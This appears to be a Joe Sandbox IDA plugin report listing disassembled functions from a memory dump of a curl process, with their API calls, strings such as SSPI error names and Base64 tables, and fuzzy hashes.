Instruction ID: 2432c2b775ff7524ff698b03e2f7059db80429f466564891775078309b23c19a
Opcode Fuzzy Hash: a069910b7e16112447585ca2bf66f6aef3820300fc95228b938ef203b0afdc6f
Instruction Fuzzy Hash: A5112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8E42B96DF3CCA4BC750

Function 000000013F49ECB1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_DOWNGRADE_DETECTED, xrefs: 000000013F49ECB1
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_DOWNGRADE_DETECTED
API String ID: 1435330505-4035505591
Opcode ID: 66253346eadda784d8989a8535fe5ad6c74660b5a38866b9ab7e8d30f3edfdd2
Instruction ID: 8287e2db470453cfbce6f346bb0c6dda38367a651c6647bac22c30463b998acc
Opcode Fuzzy Hash: 66253346eadda784d8989a8535fe5ad6c74660b5a38866b9ab7e8d30f3edfdd2
Instruction Fuzzy Hash: 1A115A31B14B4086E6619F20E4047DF7365F788B51F80413AEA8A42B96DF3CCA4BC710

Function 000000013F49ECC9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
SEC_E_INCOMPLETE_CREDENTIALS, xrefs: 000000013F49ECC9
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INCOMPLETE_CREDENTIALS
API String ID: 1435330505-965260069
Opcode ID: 093c31c1eed8a8e606177ce2d0f43c12cfdabb9527c4b5f6908968dc43e67d88
Instruction ID: 209aba245ad3700552121f7a7e289f95207f3d95d1a38debe9145d0589bb0737
Opcode Fuzzy Hash: 093c31c1eed8a8e606177ce2d0f43c12cfdabb9527c4b5f6908968dc43e67d88
Instruction Fuzzy Hash: AA112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49ECD5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_INCOMPLETE_MESSAGE, xrefs: 000000013F49ECD5
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INCOMPLETE_MESSAGE
API String ID: 1435330505-695297855
Opcode ID: f6d8f430167f9a678a48b3762f0f39f8e2b67f43924b143f0b68908b999fc137
Instruction ID: 2926f8c0aeaca9cfbdc168a701f01faf3f3f5741fec45640259cfdc64641776f
Opcode Fuzzy Hash: f6d8f430167f9a678a48b3762f0f39f8e2b67f43924b143f0b68908b999fc137
Instruction Fuzzy Hash: 07112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EC69 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_CONTEXT_EXPIRED, xrefs: 000000013F49EC69
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_CONTEXT_EXPIRED
API String ID: 1435330505-1320710087
Opcode ID: 941d832c0fe127b416e632ba0a2c791afdffc495b08fff7e7ce875314c989ed4
Instruction ID: 737488654c1c3fa62c833c5fd121476132d697d0cfd3791e3edd5154c8bb4be6
Opcode Fuzzy Hash: 941d832c0fe127b416e632ba0a2c791afdffc495b08fff7e7ce875314c989ed4
Instruction Fuzzy Hash: 8C112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EC75 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_CROSSREALM_DELEGATION_FAILURE, xrefs: 000000013F49EC75
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_CROSSREALM_DELEGATION_FAILURE
API String ID: 1435330505-4241613852
Opcode ID: 2974c576077029ee25f22865dcd853479b9b6230f44d0ea9cf22614c72c630c4
Instruction ID: 30dcb6141058a497df86f57b87907e56ed2722122d5309d3bc7505f60854cc4c
Opcode Fuzzy Hash: 2974c576077029ee25f22865dcd853479b9b6230f44d0ea9cf22614c72c630c4
Instruction Fuzzy Hash: 64115A31B14B4086E6619F20E4047DF7369F788B51F80413AEA8A42B96DF3CCA4BC710

Function 000000013F49EC8D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059
SEC_E_DECRYPT_FAILURE, xrefs: 000000013F49EC8D

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_DECRYPT_FAILURE
API String ID: 1435330505-544245674
Opcode ID: 339e242ecdf1bd0b96c92c6234d66f240e6d1b3337810cff0895d072dac6244c
Instruction ID: 3c123a08066f8238a8e983e52ffa929d531a4a38e364bcf691f4ab85d40cd05c
Opcode Fuzzy Hash: 339e242ecdf1bd0b96c92c6234d66f240e6d1b3337810cff0895d072dac6244c
Instruction Fuzzy Hash: D5112A35B14B4096F6619F20E4047DF7365F788B51F85413AEA8A42B96DF3CCA4BC750

Function 000000013F49EC81 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

%s (0x%08X), xrefs: 000000013F49F00C
SEC_E_CRYPTO_SYSTEM_INVALID, xrefs: 000000013F49EC81
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_CRYPTO_SYSTEM_INVALID
API String ID: 1435330505-4258808491
Opcode ID: f0214badc81598639f5c94e96cd189ea41e69131be946ebf9d4bb4d319cf6825
Instruction ID: ade9491e12464496e3b9cbb002d6f2f9e4b353e1dbb22adeb4a5d913b2866322
Opcode Fuzzy Hash: f0214badc81598639f5c94e96cd189ea41e69131be946ebf9d4bb4d319cf6825
Instruction Fuzzy Hash: 66115A31B14B4086E6619F20E4047DF7365F788B51F80413AEA8A42B96DF3CCA4BC710

Function 000000013F49EC99 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F49F021

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F49F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49F09C

Strings

SEC_E_DELEGATION_POLICY, xrefs: 000000013F49EC99
%s (0x%08X), xrefs: 000000013F49F00C
%s - %s, xrefs: 000000013F49F059

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_DELEGATION_POLICY
API String ID: 1435330505-2634068886
Opcode ID: 0cd4fa5997972d2d4ee78d9e2a8320fbf3ebcfa5655459d3103b7b82c026c99f
Instruction ID: 54bc8e679ada6f494bd242bbbace37bf345e0b7f7be763af8d0e5f233fb0c706
Opcode Fuzzy Hash: 0cd4fa5997972d2d4ee78d9e2a8320fbf3ebcfa5655459d3103b7b82c026c99f
Instruction Fuzzy Hash: D9112A35B14B4096E6619F20E4047DF7365F788B51F85413AEA8E42B96DF3CCA4BC750

Function 000000013F48FADC Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 151stringCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F48FB66
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48FBA2
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F48FBC1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48FC60
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48FC88
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F48FC98

Strings

|<>"?*, xrefs: 000000013F48FBF9
://, xrefs: 000000013F48FAFC

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free$_strdupmallocstrncpy
String ID: ://$|<>"?*
API String ID: 985501230-1792949323
Opcode ID: 0600182a849261e9062d5569629861bf43349ed9047c124027a684d972de031b
Instruction ID: 1fca25094a9536189b698189f5f31ca9e84b81956c4a2b496409b541e52fec7b
Opcode Fuzzy Hash: 0600182a849261e9062d5569629861bf43349ed9047c124027a684d972de031b
Instruction Fuzzy Hash: 9051A072A0578485FB628F65F5243EA6B90AB45BE0F084539CE59077C5EB3EC743C300

Function 000000013F4CF794 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 127COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F4CF8D7
__swprintf_l.LIBCMT ref: 000000013F4CF901

Strings

Basic, xrefs: 000000013F4CF7A7
%c%c%c%c, xrefs: 000000013F4CF8C5
%c%c==, xrefs: 000000013F4CF910
%c%c%c=, xrefs: 000000013F4CF8EF
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 000000013F4CF81F

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: __swprintf_l
String ID: %c%c%c%c$%c%c%c=$%c%c==$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$Basic
API String ID: 1488884202-1210452188
Opcode ID: 008efc61a97ca77bf298cc08f0642dcc73de89d7e4509fc76e16cc736a0706e8
Instruction ID: 2ae91e56ee2dc4221d414b3f9375356982931b3369f5b3c276073a7c73afaf39
Opcode Fuzzy Hash: 008efc61a97ca77bf298cc08f0642dcc73de89d7e4509fc76e16cc736a0706e8
Instruction Fuzzy Hash: 2C41F576A0878055EF15CB25A5543EF7FE1E3457A1F085229DF994379AD73CC206CB20

Function 000000013F49EAE8 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49EB01
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49EB09

Part of subcall function 000000013F49E900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 000000013F49E951
Part of subcall function 000000013F49E900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F49E967

__swprintf_l.LIBCMT ref: 000000013F49EB3F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49EB44
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F49EB4E
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49EB56
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F49EB62

Strings

Unknown error %u (0x%08X), xrefs: 000000013F49EB30

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: ErrorLast_errno$FormatMessage__swprintf_lwcstombs
String ID: Unknown error %u (0x%08X)
API String ID: 349418278-1058733786
Opcode ID: 9468cb9c56da335274d3efc2ae4695afa0fa8663077513e2bb2379488229f49c
Instruction ID: f0e5cfc0aad687be8ee04a6b137007d19efc2b7e0528809835a91cf2d90c36ce
Opcode Fuzzy Hash: 9468cb9c56da335274d3efc2ae4695afa0fa8663077513e2bb2379488229f49c
Instruction Fuzzy Hash: 3D11E936B04B5486EB119F25F80479FB761BB89F91F884438EA89037A6DF3CCA46C754

Function 000000013F4AFE4C Relevance: 13.7, APIs: 5, Strings: 4, Instructions: 165stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000013F4AFF17
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000013F4AFF31
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 000000013F4AFF54

Strings

../, xrefs: 000000013F4AFF27
/../, xrefs: 000000013F4AFF8C
/./, xrefs: 000000013F4AFF4A
/.., xrefs: 000000013F4AFFBF

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: strncmp
String ID: ../$/..$/../$/./
API String ID: 1114863663-456519384
Opcode ID: 7294579a2f72cd1ef6d50c406a1f2bca51cf8538d8eede2b9b4fdbeb408006cb
Instruction ID: 04a02284b69a21f9d5e5365b7423e356af2dee17a26500067981d8793dce51e0
Opcode Fuzzy Hash: 7294579a2f72cd1ef6d50c406a1f2bca51cf8538d8eede2b9b4fdbeb408006cb
Instruction Fuzzy Hash: 2661BB31E087C445FF615B35A4143EB6BA0A756BA4F08413EDD9A077EBEA29CB4BC311

Function 000000013F4AEDB4 Relevance: 13.6, APIs: 9, Instructions: 120COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4B5ADB), ref: 000000013F4AEF88

Part of subcall function 000000013F4AE8A4: InitializeCriticalSectionEx.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000000013F4AE926

_beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,000000013F4B5ADB), ref: 000000013F4AEEA7

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: CriticalInitializeSection_beginthreadex_errno
String ID:
API String ID: 1308403940-0
